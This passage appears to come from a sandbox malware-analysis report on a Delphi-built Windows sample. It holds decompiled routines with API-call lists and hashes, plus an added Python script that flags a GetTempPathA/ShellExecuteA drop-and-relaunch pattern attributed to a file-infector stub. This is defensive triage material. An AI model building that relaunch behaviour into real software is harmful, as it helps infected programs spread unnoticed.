                                                            					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                            					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                            • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                            • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                            • MessageBoxA.USER32 ref: 00402F90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileHandleWrite$Message
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 1570097196-2970929446
                                                            • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                            • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                            • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                            • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E0040184C() {
                                                            				void* _t2;
                                                            				void* _t3;
                                                            				void* _t14;
                                                            				intOrPtr* _t19;
                                                            				intOrPtr _t23;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t28;
                                                            
                                                            				_t26 = _t28;
                                                            				if( *0x40a5ac == 0) {
                                                            					return _t2;
                                                            				} else {
                                                            					_push(_t26);
                                                            					_push(E00401922);
                                                            					_push( *[fs:edx]);
                                                            					 *[fs:edx] = _t28;
                                                            					if( *0x40a035 != 0) {
                                                            						_push(0x40a5b4);
                                                            						L004010E4();
                                                            					}
                                                            					 *0x40a5ac = 0;
                                                            					_t3 =  *0x40a60c; // 0x4809d0
                                                            					LocalFree(_t3);
                                                            					 *0x40a60c = 0;
                                                            					_t19 =  *0x40a5d4; // 0x47f4cc
                                                            					while(_t19 != 0x40a5d4) {
                                                            						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                            						_t19 =  *_t19;
                                                            					}
                                                            					E0040114C(0x40a5d4);
                                                            					E0040114C(0x40a5e4);
                                                            					E0040114C(0x40a610);
                                                            					_t14 =  *0x40a5cc; // 0x47eeb8
                                                            					while(_t14 != 0) {
                                                            						 *0x40a5cc =  *_t14;
                                                            						LocalFree(_t14);
                                                            						_t14 =  *0x40a5cc; // 0x47eeb8
                                                            					}
                                                            					_pop(_t23);
                                                            					 *[fs:eax] = _t23;
                                                            					_push(0x401929);
                                                            					if( *0x40a035 != 0) {
                                                            						_push(0x40a5b4);
                                                            						L004010EC();
                                                            					}
                                                            					_push(0x40a5b4);
                                                            					L004010F4();
                                                            					return 0;
                                                            				}
                                                            			}

                                                            APIs
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                            • LocalFree.KERNEL32(004809D0,00000000,00401922), ref: 0040188B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,004809D0,00000000,00401922), ref: 004018AA
                                                            • LocalFree.KERNEL32(0047EEB8,?,00000000,00008000,004809D0,00000000,00401922), ref: 004018E9
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,004809D0,00000000,00401922), ref: 00401912
                                                            • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,004809D0,00000000,00401922), ref: 0040191C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                            • String ID:
                                                            • API String ID: 3782394904-0
                                                            • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                            • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                            • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                            • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                            • LocalFree.KERNEL32(004809D0,00000000,00401922), ref: 0040B323
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,004809D0,00000000,00401922), ref: 0040B342
                                                            • LocalFree.KERNEL32(0047EEB8,?,00000000,00008000,004809D0,00000000,00401922), ref: 0040B381
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,004809D0,00000000,00401922), ref: 0040B3AA
                                                            • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,004809D0,00000000,00401922), ref: 0040B3B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                            • String ID:
                                                            • API String ID: 3782394904-0
                                                            • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                            • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                            • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                            • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                            				long _t11;
                                                            				void* _t16;
                                                            
                                                            				_t16 = __ebx;
                                                            				 *__edi =  *__edi + __ecx;
                                                            				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
                                                            				 *0x40900c = 2;
                                                            				 *0x40a010 = 0x401008;
                                                            				 *0x40a014 = 0x401010;
                                                            				 *0x40a036 = 2;
                                                            				 *0x40a000 = E00403960;
                                                            				if(E00402808() != 0) {
                                                            					_t3 = E00402838();
                                                            				}
                                                            				E004028FC(_t3);
                                                            				 *0x40a03c = 0xd7b0;
                                                            				 *0x40a208 = 0xd7b0;
                                                            				 *0x40a3d4 = 0xd7b0;
                                                            				 *0x40a02c = GetCommandLineA();
                                                            				 *0x40a028 = E00401098();
                                                            				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                            					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                            				} else {
                                                            					if((GetVersion() & 0x000000ff) <= 4) {
                                                            						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                            					} else {
                                                            						 *0x40a5a8 = 3;
                                                            					}
                                                            				}
                                                            				_t11 = GetCurrentThreadId();
                                                            				 *0x40a020 = _t11;
                                                            				return _t11;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00402808: GetKeyboardType.USER32(00000000), ref: 0040280D
                                                              • Part of subcall function 00402808: GetKeyboardType.USER32(00000001), ref: 00402819
                                                            • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                            • GetVersion.KERNEL32 ref: 00403DF7
                                                            • GetVersion.KERNEL32 ref: 00403E08
                                                            • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                              • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                              • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                              • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                            • GetThreadLocale.KERNEL32 ref: 00403E24
                                                              • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3734044017-0
                                                            • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                            • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                            • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                            • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                             			// Delphi RTL start-up routine (System unit, _FpuInit): reads an optional
                                                             			// override for the x87 control-word exception mask from
                                                             			// HKLM\SOFTWARE\Borland\Delphi\RTL\FPUMaskValue. Every Delphi-built
                                                             			// executable carries this code, so the registry access it generates is a
                                                             			// compiler fingerprint for triage, not attacker behaviour.
                                                             			E00402838() {
                                                             				void* _v8;              // HKEY returned by RegOpenKeyExA
                                                             				char _v12;              // DWORD buffer: default control word, overwritten by the registry value if present
                                                             				int _v16;               // cbData for RegQueryValueExA (4)
                                                             				signed short _t12;
                                                             				signed short _t14;
                                                             				intOrPtr _t27;
                                                             				void* _t29;
                                                             				void* _t31;
                                                             				intOrPtr _t32;
                                                             
                                                             				_t29 = _t31;
                                                             				_t32 = _t31 + 0xfffffff4;
                                                             				_v12 =  *0x409018 & 0x0000ffff;   // Default8087CW, 0x1332 in this image
                                                             				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                             					// Key absent (the normal case on a machine without Delphi installed):
                                                             					// the low six exception-mask bits are merged from _v12, which still
                                                             					// holds the default, so the control word is unchanged.
                                                             					_t12 =  *0x409018; // 0x1332
                                                             					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                             					 *0x409018 = _t14;
                                                             					return _t14;
                                                             				} else {
                                                             					// try/finally frame: push handler E004028A9 onto the SEH chain at fs:[0]
                                                             					_push(_t29);
                                                             					_push(E004028A9);
                                                             					_push( *[fs:eax]);
                                                             					 *[fs:eax] = _t32;
                                                             					_v16 = 4;
                                                             					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                             					_pop(_t27);
                                                             					 *[fs:eax] = _t27;       // unlink the SEH frame
                                                             					// After RegCloseKey control continues at 0x4028b0, the mask merge shown
                                                             					// in the other branch, now with the registry value in _v12.
                                                             					_push(0x4028b0);
                                                             					return RegCloseKey(_v8);
                                                             				}
                                                             			}
                                                             
                                                             Instruction addresses behind the listing above: 0x00402839, 0x0040283b, 0x00402845, 0x00402861, 0x004028b0, 0x004028c2, 0x004028c5, 0x004028ce, 0x00402863, 0x00402865, 0x00402866, 0x0040286b, 0x0040286e, 0x00402871, 0x0040288d, 0x00402894, 0x00402897, 0x0040289a, 0x004028a8, 0x004028a8

                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                            • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                            • API String ID: 3677997916-4173385793
                                                            • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                            • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                            • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                            • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                            • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                            • API String ID: 3677997916-4173385793
                                                            • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                            • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                            • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                            • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                            • String ID:
                                                            • API String ID: 730355536-0
                                                            • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                            • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                            • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                            • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                             			// VCL-style icon handle setter: replaces the HICON stored at object
                                                             			// offset 0x1c, releasing the previous one through E004064E4 (which calls
                                                             			// DestroyCursor) and caching a bitmap handle of the new icon at 0x18.
                                                             			E00406520(void* __eax, struct HICON__* __edx) {
                                                             				void _v32;                  // BITMAP structure (0x18 bytes) filled by GetObjectA
                                                             				void* _v40;                 // ICONINFO bitmap handle that is queried and cached at +0x18
                                                             				void* _v48;                 // ICONINFO bitmap handle, released below
                                                             				void* _v52;                 // ICONINFO bitmap handle, released below
                                                             				void* _t9;                  // return value (the decompiler left it undeclared)
                                                             				void* _t17;
                                                             				void* _t20;
                                                             				struct _ICONINFO* _t23;     // address of the stack ICONINFO; the decompiler did not recover its initialisation
                                                             
                                                             				_t9 = __eax;
                                                             				_t20 = __eax;
                                                             				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
                                                             					E004064E4(__eax);       // release the handle currently held
                                                             					_t9 = __edx;
                                                             					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
                                                             					if(__edx != 0) {
                                                             						// GetIconInfo returns two bitmaps (hbmMask, hbmColor) that the caller
                                                             						// owns and must free with DeleteObject, which is what the tail does.
                                                             						GetIconInfo(__edx, _t23);
                                                             						GetObjectA(_v40, 0x18,  &_v32);    // 0x18 == sizeof(BITMAP)
                                                             						 *(_t20 + 0x18) = _v40;
                                                             						_t17 = _v52;
                                                             						if(_t17 != 0) {
                                                             							DeleteObject(_t17);
                                                             						}
                                                             						_t9 = _v48;
                                                             						if(_t9 != 0) {
                                                             							return DeleteObject(_t9);
                                                             						}
                                                             					}
                                                             				}
                                                             				return _t9;
                                                             			}
                                                             
                                                             Instruction addresses behind the listing above: 0x00406520, 0x00406527, 0x0040652c, 0x00406530, 0x00406535, 0x00406537, 0x0040653c, 0x00406540, 0x00406551, 0x0040655a, 0x0040655d, 0x00406563, 0x00406566, 0x00406566, 0x0040656b, 0x00406571, 0x00000000, 0x00406574, 0x00406571, 0x0040653c, 0x0040657e

                                                            APIs
                                                              • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                            • GetIconInfo.USER32(?), ref: 00406540
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                            • DeleteObject.GDI32(?), ref: 00406566
                                                            • DeleteObject.GDI32(?), ref: 00406574
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$Delete$CursorDestroyIconInfo
                                                            • String ID:
                                                            • API String ID: 3133107492-0
                                                            • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                            • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                            • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                            • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                            • GetIconInfo.USER32(?), ref: 0040FFD8
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                            • DeleteObject.GDI32(?), ref: 0040FFFE
                                                            • DeleteObject.GDI32(?), ref: 0041000C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$Delete$CursorDestroyIconInfo
                                                            • String ID:
                                                            • API String ID: 3133107492-0
                                                            • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                            • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                            • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                            • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteIconInfoObject
                                                            • String ID: ,k@
                                                            • API String ID: 2689914137-1053005162
                                                            • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                            • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                            • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                            • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                              • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                              • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                            • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                            • String ID: open
                                                            • API String ID: 2622400689-2758837156
                                                            • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                            • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                            • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                            • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
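The API lists in this section carry two things an analyst wants to separate quickly: the RegOpenKeyExA on SOFTWARE\Borland\Delphi\RTL is Delphi run-time start-up code found in every Delphi binary, while the GetModuleFileNameA / GetTempPathA / ShellExecuteA("open") combination in the function at 0x00411368-0x00411401 is the relaunch behaviour a file-infector stub shows when it hands control back to the host program it carries. The script below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it parses the report's bullet lines into records and applies those two rules. The rule names, their wording and the ApiCall structure are this example's own; the embedded input is a copy of the API bullets shown above so the script runs offline.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One bullet of the "APIs" lists in this report, e.g.
#   • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
#   • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(...), ref: 0040E4A1
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass(frozen=True)
class ApiCall:
    api: str                 # e.g. "RegOpenKeyExA"
    dll: str                 # e.g. "ADVAPI32"
    args: tuple              # argument tokens exactly as the sandbox printed them
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the call sits in a sub-function


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's bullet lines into records; headings and other text are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        calls.append(ApiCall(
            api=m["api"],
            dll=m["dll"],
            args=tuple(a.strip() for a in m["args"].split(",") if a.strip()),
            ref=int(m["ref"], 16),
            subcall=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def classify(calls: List[ApiCall]) -> Dict[str, str]:
    """Map finding name -> explanation for the two patterns visible in this section.

    Rule names and wording are this example's own, not the sandbox's."""
    findings: Dict[str, str] = {}
    apis = {c.api for c in calls}

    # Compiler noise: every Delphi binary's RTL reads FPUMaskValue from
    # HKLM\SOFTWARE\Borland\Delphi\RTL at start-up (function E00402838 above).
    if any(c.api == "RegOpenKeyExA" and any("Borland\\Delphi\\RTL" in a for a in c.args)
           for c in calls):
        findings["delphi_rtl_fpu_mask"] = (
            "benign: Delphi RTL start-up reading HKLM\\SOFTWARE\\Borland\\Delphi\\RTL; "
            "a compiler fingerprint, not registry tampering")

    # Suspicious: locate own image, resolve %TEMP%, then hand a file to the
    # shell with the "open" verb. A file infector's stub behaves this way when
    # it launches the original host program it carries.
    shell_open = [c for c in calls if c.api == "ShellExecuteA" and "open" in c.args]
    if shell_open and {"GetTempPathA", "GetModuleFileNameA"} <= apis:
        findings["drop_and_relaunch"] = (
            'suspicious: GetModuleFileNameA + GetTempPathA + ShellExecuteA("open") at '
            + ", ".join(f"0x{c.ref:08x}" for c in shell_open)
            + "; check what is written under %TEMP% before the shell call")
    return findings


# Constructed input: the API bullets of two listings in this section, copied
# with their headings so the script runs offline.
SAMPLE_REPORT_LINES = r"""
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
• RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
Strings
APIs
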